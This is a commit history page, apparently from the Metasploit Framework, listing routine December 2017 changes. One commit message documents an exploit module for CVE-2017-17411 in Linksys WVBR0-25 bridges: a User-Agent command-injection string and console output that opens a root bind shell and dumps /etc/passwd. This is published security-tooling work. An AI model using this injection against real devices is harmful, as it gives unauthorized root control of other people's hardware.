Commit Graph

44847 Commits (d756db4f9dd585ba3e68f641cc7f5875de8dce1e)

Author SHA1 Message Date
b0yd e088c95a99 Module Cleanup 2017-12-22 10:51:01 -05:00
Tod Beardsley 674397fa06
Merge pull request #19 from jhart-r7/pr/9316
Correct permissions, fixing warning
2017-12-22 09:45:43 -06:00
Jon Hart b29948412e
Correct permissions, fixing warning 2017-12-22 07:27:11 -08:00
b0yd d657a9dc53 Commvault Remote Command Injection 2017-12-22 10:04:13 -05:00
headlesszeke 3dfb836768 Ranking upgrade and uses agent key instead of manually setting user-agent in headers 2017-12-21 23:10:26 -06:00
headlesszeke b31ac73996 Ensure vulnerability check cannot false positive with the power of runtime randomness 2017-12-21 22:53:46 -06:00
William Vu dc2b5df2ef
Update LICENSE for mysql_udf_payload 2017-12-21 21:03:22 -06:00
William Vu caae33b417
Land #9170, Linux UDF for mysql_udf_payload 2017-12-21 20:48:24 -06:00
headlesszeke 8c3836cc88 Removed msf/core require statement and extraneous debug message 2017-12-21 19:55:56 -06:00
juushya a86abb0297 Implemented get_cookies_parsed 2017-12-22 05:36:36 +05:30
headlesszeke 96cff8b615
Merge pull request #1 from headlesszeke/headlesszeke-cve-2017-17411
Adds exploit module for CVE-2017-17411
2017-12-21 17:51:35 -06:00
headlesszeke 2ee42e1433
Adds exploit module for CVE-2017-17411
This module is for exploiting vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vuln in question involves a command injection due to improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to `";<payload> #`. This can be verified against WVBR0-25 devices running firmware < 1.0.41.

Example console output:

```
msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth 
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > info

       Name: Linksys WVBR0-25 User-Agent Command Execution
     Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
   Platform: Unix
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-12-13

Provided by:
  HeadlessZeke

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                     yes       The target address
  RPORT    80               yes       The target port
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Payload information:
  Space: 1024

Description:
  The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to 
  connect wireless Genie cable boxes to the Genie DVR, is vulnerable 
  to OS command injection in version < 1.0.41 of the web management 
  portal via the User-Agent header. Authentication is not required to 
  exploit this vulnerability.

References:
  http://cvedetails.com/cve/2017-17411/
  http://www.zerodayinitiative.com/advisories/ZDI-17-973
  https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show payloads 

Compatible Payloads
===================

   Name                     Disclosure Date  Rank    Description
   ----                     ---------------  ----    -----------
   cmd/unix/bind_netcat                      normal  Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/generic                          normal  Unix Command, Generic Command Execution
   cmd/unix/reverse_netcat                   normal  Unix Command Shell, Reverse TCP (via netcat)

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat 
payload => cmd/unix/bind_netcat
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
RHOST => 10.0.0.104
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] Started bind handler
[*] 10.0.0.104:80 - Exploiting...
[*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600
id

uid=0(root) gid=0(root)
^C
Abort session 1? [y/N]  y

[*] 10.0.0.104 - Command shell session 1 closed.  Reason: User exit
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/generic 
payload => cmd/unix/generic
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set cmd cat /etc/passwd
cmd => cat /etc/passwd
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] 10.0.0.104:80 - Exploiting...
[+] 10.0.0.104:80 - Command sent successfully
[*] 10.0.0.104:80 - Command output:  root0:0::/:/bin/sh nobody99:99:Nobody:/:/bin/nologin sshd22:22::/var/empty:/sbin/nologin admin1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga1001:1001:Quagga
[*] Exploit completed, but no session was created.
msf exploit(linksys_wvbr0_user_agent_exec_noauth) >
```
2017-12-21 17:44:35 -06:00
Metasploit 909caa0425
Bump version of framework to 4.16.27 2017-12-21 13:27:52 -08:00
Brent Cook 9d8cb8a8d0 Merge branch '4.x' into upstream-master 2017-12-21 15:17:38 -06:00
Metasploit ee2f10efc5
Bump version of framework to 4.16.26 2017-12-21 10:04:38 -08:00
Tod Beardsley 5dfb5d581a
Switch get_cookies to get_cookies_parsed
Am I doing it right? See #9333
2017-12-21 09:00:56 -06:00
Jon Hart becc05b4f1
Cleaner client_id handling 2017-12-21 06:57:33 -08:00
Jon Hart 157d973194
Merge branch 'feature/mqtt' into feature/mqtt-login 2017-12-20 19:13:34 -08:00
Jon Hart 82bdce683b
Remove to_s 2017-12-20 19:13:12 -08:00
Jon Hart adca42f311
Merge branch 'feature/mqtt' into feature/mqtt-login 2017-12-20 19:11:52 -08:00
Jon Hart b78f1105f7
Add missing port 2017-12-20 19:11:33 -08:00
Jon Hart 917e9aa328
Doc READ_TIMEOUT 2017-12-20 19:10:49 -08:00
Jon Hart bedc276225
Merge branch 'feature/mqtt' into feature/mqtt-login 2017-12-20 19:09:51 -08:00
Jon Hart ddb2566f3b
Remove duplicate options, set less suspicious client_id 2017-12-20 19:09:35 -08:00
Jon Hart 962bc71d10
Merge branch 'feature/mqtt' into feature/mqtt-login 2017-12-20 18:58:36 -08:00
Jon Hart cf21d13b2e
Resolve conflict 2017-12-20 18:58:16 -08:00
Jon Hart 9c0df54f36
syntax 2017-12-20 18:54:09 -08:00
Jon Hart fa1536209a
syntax 2017-12-20 18:52:34 -08:00
Jon Hart 508253eadc
More docs 2017-12-20 18:51:44 -08:00
Jon Hart 0f72ce1ee5
Add WIP documentation for auxiliary/scanner/mqtt/connect 2017-12-20 18:45:10 -08:00
Jon Hart 298cb16b1a
Set default USER/PASS files 2017-12-20 18:44:43 -08:00
Jon Hart 37ae5e1303
Add admin as a default unix passwd 2017-12-20 18:44:21 -08:00
William Vu 1975713a92
Land #9333, get_cookies_parsed using CGI::Cookie 2017-12-20 20:08:33 -06:00
Jon Hart b9af835d06
Style 2017-12-20 18:05:00 -08:00
Jon Hart d0b3abc14b
Better handling of MQTT endpoints which don't require authentication
Arguably this is working around LoginScanner's inability to provide
blank usernames AND passwords
2017-12-20 18:02:52 -08:00
Jon Hart 2e62d77e36
Add new method for fetching parsed cookies from an HTTP response
This fixed #9332.
2017-12-20 16:19:44 -08:00
Brent Cook d567c965b0
Land #9331, fix powershell extension, python meterpreter http headers 2017-12-20 16:52:41 -06:00
Brent Cook 24907938bb
bump payloads, various fixes 2017-12-20 16:47:37 -06:00
Jon Hart 495c649c7d
Better printing 2017-12-20 14:40:42 -08:00
Jon Hart ed5f177fcd
syntax 2017-12-20 14:20:08 -08:00
Jon Hart e66ec85677
Set default u/p 2017-12-20 14:18:33 -08:00
Brent Cook 3b78302868
Land #9327, restore transport enum used in TLVs 2017-12-20 16:11:04 -06:00
Brent Cook 5fe9dba4dd
Land #9296, add iOS meterpreter support 2017-12-20 16:09:41 -06:00
Brent Cook df4f62cde9 bump to mettle 0.3.3 2017-12-20 15:58:17 -06:00
Jon Hart 7723933fa9
Merge branch 'feature/mqtt' into feature/mqtt-login 2017-12-20 13:42:16 -08:00
Jon Hart 741d08f604
Style cleanup 2017-12-20 13:33:47 -08:00
Jeffrey Martin 8cd7185a7f
Land #9313, Add DirectAdmin login_scanner module 2017-12-20 15:23:24 -06:00
Jeffrey Martin 7f8a5d3834
improved credential reporting 2017-12-20 15:09:11 -06:00
Nick Marcoccio 86ce3c8781 Made suggested changes and added documentation 2017-12-20 15:54:16 -05:00
Jon Hart 14c779b945
Fix rubocop warning 2017-12-20 12:44:27 -08:00